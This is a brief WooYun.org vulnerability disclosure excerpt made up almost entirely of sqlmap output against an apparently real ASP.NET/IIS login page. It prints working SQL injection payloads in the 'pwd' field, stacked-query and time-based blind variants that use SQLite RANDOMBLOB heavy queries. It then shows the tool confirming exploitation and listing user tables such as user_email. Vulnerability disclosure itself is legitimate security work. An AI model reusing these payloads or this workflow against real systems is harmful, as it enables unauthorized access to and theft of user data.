WooYun.org

Place: POST
Parameter: pwd
    Type: stacked queries
    Title: SQLite > 2.0 stacked queries (heavy query)
    Payload: __VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55S
o5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9
fFgEFB21lbXBhc3NyySPJunircnTGi856yoNga03SvQ==&__VIEWSTATEGENERATOR=CA0B0334&__EV
ENTVALIDATION=/wEWBgL2vcS4CwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBizbl1mCN6fA N
n7F0WGZ6zbyD e&username=QBya&pwd='; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5
00000000/2))))--&mempass=on&btn_ok=%E7%A1%AE%E8%AE%A4
    Type: AND/OR time-based blind
    Title: SQLite > 2.0 OR time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55S
o5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9
fFgEFB21lbXBhc3NyySPJunircnTGi856yoNga03SvQ==&__VIEWSTATEGENERATOR=CA0B0334&__EV
ENTVALIDATION=/wEWBgL2vcS4CwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBizbl1mCN6fA N
n7F0WGZ6zbyD e&username=QBya&pwd=-7215' OR 5402=LIKE('ABCDEFG',UPPER(HEX(RANDOMB
LOB(500000000/2)))) AND 'FjMW'='FjMW&mempass=on&btn_ok=%E7%A1%AE%E8%AE%A4
---
do you want to exploit this SQL injection? [Y/n] y
[15:40:47] [INFO] the back-end DBMS is SQLite
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: SQLite
[15:40:47] [WARNING] on SQLite it is not possible to enumerate databases (use on
ly '--tables')
[15:40:47] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'D:\Python27\sqlmap\output\results-06212015_0340pm.csv'
[*] shutting down at 15:40:47

[16:46:10] [INFO] resumed: ?qlite_sequence
[16:46:10] [INFO] resumed: user_state
[16:46:10] [INFO] resumed: folder
[16:46:10] [INFO] resumed: user_email